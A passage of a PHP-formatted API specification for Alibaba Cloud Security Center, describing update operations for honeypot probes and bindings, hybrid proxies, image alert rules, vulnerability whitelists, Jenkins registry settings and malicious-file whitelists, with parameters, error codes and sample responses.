returned message.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '60922C83-6B19-5A57-8F13-4663C6D391F4', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code of the request.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Modify honeypot template configuration', 'summary' => 'Modifies the configuration of a specified honeypot template.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:UpdateHoneypotPreset', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'HoneypotPreset', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:honeypotpreset/{#HoneypotPresetId}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"60922C83-6B19-5A57-8F13-4663C6D391F4\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', ], 'UpdateHoneypotProbe' => [ 'summary' => 'Updates the properties of a specified probe.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas30M8TS'], ], 'parameters' => [ [ 'name' => 'ProbeId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The probe ID.'."\n" .'>You can call the [ListHoneypotProbe](~~ListHoneypotProbe~~) operation to obtain this parameter.', 'type' => 'string', 'required' => true, 'example' => 'bbe7e382-956f-473e-beed-bc73a258****'], ], [ 'name' => 'DisplayName', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The probe name.', 'type' => 'string', 'required' => false, 'example' => 'svwsx-vpc-4430'], ], [ 'name' => 'Ping', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The ping detection type.', 'type' => 'boolean', 'required' => false, 'example' => 'true'], ], [ 'name' => 'Arp', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The ARP check type.', 'type' => 'boolean', 'required' => false, 'example' => 'false'], ], [ 'name' => 'ServiceIpList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of listening IP addresses.', 'type' => 'array', 'items' => ['description' => 'The listening IP address.', 'type' => 'string', 'required' => false, 'example' => '192.168.XX.XX', 'title' => ''], 'required' => false, 'maxItems' => 20, 'title' => '', 'example' => '', ], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'Success' => ['description' => 'Indicates whether the call was successful. Valid values:'."\n" ."\n" .'- **true**: The call was successful.'."\n" .'- **false**: The call failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Any other value indicates failure. You can use this field to determine the cause of the failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The returned message.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'AB62FFAA-E1A5-5D7C-8D97-0F16C6A6F520', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code of the request.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'ProbeNotExist', 'errorMessage' => 'Probe does not exist.', 'description' => ''], ['errorCode' => 'ProbeNameAlreadyExists', 'errorMessage' => 'The probe name already exists.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Update probe properties', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:UpdateHoneypotProbe', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'HoneypotProbe', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:honeypotprobe/{#HoneypotProbeId}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"AB62FFAA-E1A5-5D7C-8D97-0F16C6A6F520\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', ], 'UpdateHoneypotProbeBind' => [ 'methods' => ['post', 'get'], 'schemes' => ['https', 'http'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => ['operationType' => 'update'], 'parameters' => [ [ 'name' => 'Id', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The probe service port ID.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1906'], ], [ 'name' => 'ProbeId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The probe ID.'."\n" .'>You can call the [ListHoneypotProbe](~~ListHoneypotProbe~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => '36bad711-d1ac-4419-ac68-c1aa280f****'."\n"], ], [ 'name' => 'BindId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The unique ID of the bound service.', 'type' => 'string', 'required' => false, 'example' => 'f52e8624-e43c-473c-8312-e0fed384****'."\n"], ], [ 'name' => 'BindType', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The service binding type. Valid values:'."\n" ."\n" .'- **forward_honey**: forward to honeypot'."\n" .'- **scan_port**: listen for scans.', 'type' => 'string', 'required' => false, 'example' => 'forward_honey'], ], [ 'name' => 'HoneypotId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The honeypot ID.'."\n" .'> You can call the [ListHoneypot](~~ListHoneypot~~) operation to obtain this value.', 'type' => 'string', 'required' => false, 'example' => 'dba7d44775be8e0e5888ee3b1a62554a93d2512247cabc38ddeac17a3b3f****'."\n"], ], [ 'name' => 'ServiceIpList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'title' => '', 'description' => 'The list of listening IP addresses.', 'type' => 'array', 'items' => ['description' => 'The listening IP address.', 'type' => 'string', 'required' => false, 'example' => '0.0.0.0'."\n", 'title' => ''], 'required' => false, 'maxItems' => 20, 'example' => '', ], ], [ 'name' => 'Ports', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The listening port range.', 'type' => 'string', 'required' => false, 'example' => '{\\"tcp\\":\\"1-65535\\",\\"udp\\":\\"1-65535\\"}'."\n"], ], [ 'name' => 'SetStatus', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The listening port status setting.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0'], ], [ 'name' => 'BindPortList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'title' => '', 'description' => 'The list of bound ports.', 'type' => 'array', 'items' => [ 'description' => 'The bound port data.', 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The unique identifier of the bound port.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '3183', 'title' => ''], 'TargetPort' => ['description' => 'The destination port.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '80', 'title' => ''], 'StartPort' => ['description' => 'The start port that the probe listens on.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '81', 'title' => ''], 'EndPort' => ['description' => 'The end port that the probe listens on.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '81', 'title' => ''], 'Fixed' => ['description' => 'Specifies whether the port is fixed. Valid values:'."\n" ."\n" .'- **0**: No.'."\n" .'- **1**: Yes.', 'type' => 'boolean', 'required' => false, 'example' => '0', 'title' => ''], 'BindPort' => ['description' => 'Specifies whether to bind the port. Valid values:'."\n" ."\n" .'- **true**: Yes.'."\n" .'- **false**: No.', 'type' => 'boolean', 'required' => false, 'example' => 'false', 'title' => ''], 'Proto' => ['description' => 'The protocol type. Valid values:'."\n" ."\n" .'- **tcp**'."\n" .'- **udp**.', 'type' => 'string', 'required' => false, 'example' => 'tcp', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 20, 'example' => '', ], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the request and response. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the page to return. Minimum value: **1**. Default value: **1**.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries to return on each page when using paged query. Default value: 20. If you leave this parameter empty, 20 entries are returned per page by paging.'."\n" .'> Do not leave PageSize empty.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response data.', 'type' => 'object', 'properties' => [ 'Success' => ['description' => 'Indicates whether the call was successful. Valid values:'."\n" .'- **true**: The call was successful.'."\n" .'- **false**: The call failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Any other value indicates failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The detailed error message.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '425D9617-4F4F-571E-A9CF-0245C9FC****', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code of the response.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'ProbeNotExist', 'errorMessage' => 'Probe does not exist.', 'description' => ''], ['errorCode' => 'BindPortAlreadyExist', 'errorMessage' => 'The specified service port already exists.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Modify a probe service', 'summary' => 'Modifies a probe service.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:UpdateHoneypotProbeBind', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"425D9617-4F4F-571E-A9CF-0245C9FC****\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', ], 'UpdateHybridProxy' => [ 'summary' => 'Upgrades a hybrid cloud proxy client.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'abilityTreeCode' => '164118', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'ProxyUuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the proxy client.', 'type' => 'string', 'required' => true, 'example' => 'inet-proxy-14bbbb37-c4b9-4e86-83bd-137a940a6ec4', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'BaseResult', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => 'C0DD0616-0DA0-5450-B89E-F30D49E63D6B', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'DataExists', 'errorMessage' => '%s data exist', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Upgrade a hybrid cloud proxy client', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdateHybridProxy'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:UpdateHybridProxy', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"C0DD0616-0DA0-5450-B89E-F30D49E63D6B\\"\\n}","type":"json"}]', ], 'UpdateImageEventOperation' => [ 'summary' => 'Updates an alert handling rule.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '195583', 'abilityTreeNodes' => ['FEATUREsasF0IRDR'], ], 'parameters' => [ [ 'name' => 'Id', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The ID of the alert handling rule.'."\n" .'> You can call [DescribeImageEventOperationPage](~~DescribeImageEventOperationPage~~) to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'docRequired' => true, 'required' => true, 'example' => '814163'], ], [ 'name' => 'Scenarios', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The rule scope. The value is in JSON format. The following keys are supported:'."\n" .'- **type**: the scope type.'."\n" .'- **value**: the scope value.'."\n" .'> This parameter and Source cannot both be empty. If Source is set to agentless, this parameter does not take effect.', 'type' => 'string', 'required' => false, 'example' => '{\\"type\\": \\"repo\\", \\"value\\": \\"test-aaa/shenzhen-repo-01\\"}'], ], [ 'name' => 'Source', 'in' => 'query', 'schema' => ['description' => 'The whitelist source. Valid values:'."\n" .'- **image**: image.'."\n" .'- **agentless**: agentless detection.'."\n" .'> This parameter and Scenarios cannot both be empty. If this parameter is set to agentless, the Scenarios parameter does not take effect.', 'type' => 'string', 'required' => false, 'example' => 'agentless', 'title' => ''], ], [ 'name' => 'Conditions', 'in' => 'query', 'schema' => ['description' => 'The rule conditions. The value is in JSON format. The following keys are supported:'."\n" .'- **condition**: the matching condition.'."\n" .'- **type**: the matching type.'."\n" .'- **value**: the matching value.', 'type' => 'string', 'docRequired' => true, 'required' => true, 'example' => '[{\\"condition\\": \\"MD5\\", \\"type\\": \\"equals\\", \\"value\\": \\"0083a31cc0083a31ccf7c10367a6e****\\"}]'."\n", 'title' => ''], ], [ 'name' => 'Note', 'in' => 'query', 'schema' => ['description' => 'The remarks to add.', 'type' => 'string', 'required' => false, 'example' => 'test', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response.', 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The returned data.', 'type' => 'object', 'properties' => [ 'Id' => ['title' => '', 'description' => 'The ID of the alert handling rule, which is the same as the alert handling rule ID in the request parameters.', 'type' => 'integer', 'format' => 'int64', 'example' => '67429'], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'The status of the request response. Valid values:'."\n" ."\n" .'- **true**: The request was successful.'."\n" .'- **false**: The request failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The status code returned by the API request.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The message returned for the request.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The unique request ID.', 'type' => 'string', 'example' => '7532B7EE-7CE7-5F4D-BF04-B12447DD****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Update an alert handling rule', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdateImageEventOperation'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:UpdateImageEventOperation', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'ImageEventOperation', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:imageeventoperation/{#ImageEventOperationId}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"Id\\": 67429\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"7532B7EE-7CE7-5F4D-BF04-B12447DD****\\"\\n}","type":"json"}]', ], 'UpdateImageVulWhitelistTarget' => [ 'summary' => 'Updates an image vulnerability whitelist.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => ['operationType' => 'update'], 'parameters' => [ [ 'name' => 'Id', 'in' => 'query', 'schema' => ['description' => 'The ID of the vulnerability whitelist.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '2000083', 'title' => ''], ], [ 'name' => 'Target', 'in' => 'query', 'schema' => ['description' => 'The operation target. This parameter is in JSON format and contains the following fields:'."\n" ."\n" .'- **type**: The target type. Set to repo.'."\n" .'- **target**: The target content. Format: namespace/image repository.', 'type' => 'string', 'required' => false, 'example' => '{\\"type\\":\\"repo\\",\\"target\\":[\\"sas_test/script_0209\\",\\"sas_test/script\\"]}', 'title' => ''], ], [ 'name' => 'Reason', 'in' => 'query', 'schema' => ['description' => 'The reason for adding the whitelist.', 'type' => 'string', 'required' => false, 'example' => 'ignore', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'Source', 'in' => 'query', 'schema' => ['description' => 'The source of the whitelist. Valid values:'."\n" .'- **image**: image'."\n" .'- **agentless**: agentless.', 'type' => 'string', 'required' => false, 'example' => 'image', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'PlainResult', 'type' => 'object', 'properties' => [ 'Data' => ['description' => 'The processing result. Valid values:'."\n" ."\n" .'- **true**: Succeeded.'."\n" .'- **false**: Failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Success' => ['description' => 'Indicates whether the API call was successful. Valid values:'."\n" ."\n" .'- **true**: The API call was successful.'."\n" .'- **false**: The API call failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Any other value indicates failure. You can use this field to determine the cause of a failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The returned message of the request result.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The unique request ID.', 'type' => 'string', 'example' => '9F4E6157-9600-5588-86B9-38F09067****', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Update an image vulnerability whitelist', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdateImageVulWhitelistTarget'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:UpdateImageVulWhitelistTarget', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": true,\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"9F4E6157-9600-5588-86B9-38F09067****\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', ], 'UpdateJenkinsImageRegistryName' => [ 'summary' => 'Modifies the image name in a Jenkins image repository.', 'methods' => ['post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => ['operationType' => 'update'], 'parameters' => [ [ 'name' => 'RegistryId', 'in' => 'formData', 'schema' => ['title' => '', 'description' => 'The image repository ID.'."\n" .'>You can call the [PageImageRegistry](~~PageImageRegistry~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '25090'], ], [ 'name' => 'RegistryName', 'in' => 'formData', 'schema' => ['title' => '', 'description' => 'The image repository name.', 'type' => 'string', 'required' => false, 'example' => 'a0603tk1'], ], [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '121.33.XXX.XXX', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'Data' => ['description' => 'The returned result. Valid values:'."\n" .'- **true**: Processing succeeded.'."\n" .'- **false**: Processing failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '4347E985-6E64-467B-96EC-30D4EA9E****', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], 'TimeCost' => ['description' => 'The time consumed for the execution. Unit: seconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Modify jenkins image repository image name', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdateJenkinsImageRegistryName'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:UpdateJenkinsImageRegistryName', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": true,\\n \\"RequestId\\": \\"4347E985-6E64-467B-96EC-30D4EA9E****\\",\\n \\"HttpStatusCode\\": 200,\\n \\"TimeCost\\": 1\\n}","type":"json"}]', ], 'UpdateJenkinsImageRegistryPersistenceDay' => [ 'summary' => 'Modifies the image retention period for a Jenkins image repository.', 'methods' => ['post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => ['operationType' => 'update'], 'parameters' => [ [ 'name' => 'RegistryId', 'in' => 'formData', 'schema' => ['title' => '', 'description' => 'The image repository ID.'."\n" .'>You can call the [PageImageRegistry](~~PageImageRegistry~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '25363'], ], [ 'name' => 'PersistenceDay', 'in' => 'formData', 'schema' => ['title' => '', 'description' => 'The retention period. Unit: days.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '30'], ], [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '106.11.XXX.XXX', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'Data' => ['description' => 'The processing result. Valid values:'."\n" .'- **true**: Succeeded.'."\n" .'- **false**: Failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '69F88BA1-004C-51E2-BF5C-A3220E5A****', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], 'TimeCost' => ['description' => 'The time consumed for execution. Unit: seconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Modify jenkins image repository image retention period', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdateJenkinsImageRegistryPersistenceDay'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:UpdateJenkinsImageRegistryPersistenceDay', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": true,\\n \\"RequestId\\": \\"69F88BA1-004C-51E2-BF5C-A3220E5A****\\",\\n \\"HttpStatusCode\\": 200,\\n \\"TimeCost\\": 1\\n}","type":"json"}]', ], 'UpdateMaliciousFileWhitelistConfig' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasON13NY'], ], 'parameters' => [ [ 'name' => 'ConfigId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The rule ID. This parameter is optional. If you do not specify this parameter, a whitelist rule is created.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1'], ], [ 'name' => 'EventName', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The alerting name. Valid values:'."\n" .'- ALL: all Alarm Metric.', 'type' => 'string', 'required' => false, 'example' => 'ALL'], ], [ 'name' => 'Field', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The field to be whitelisted.', 'type' => 'string', 'required' => false, 'example' => 'fileMd5'], ], [ 'name' => 'Operator', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The operator used for rule matching. Valid values:'."\n" .'- strEqual: string equals.', 'type' => 'string', 'required' => false, 'example' => 'strEqual'], ], [ 'name' => 'FieldValue', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The value of the field to be whitelisted.', 'type' => 'string', 'required' => false, 'example' => 'b2cf9747ee49d8d9b105cf16e078cc16'], ], [ 'name' => 'TargetType', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The type of the target scope. Valid values:'."\n" 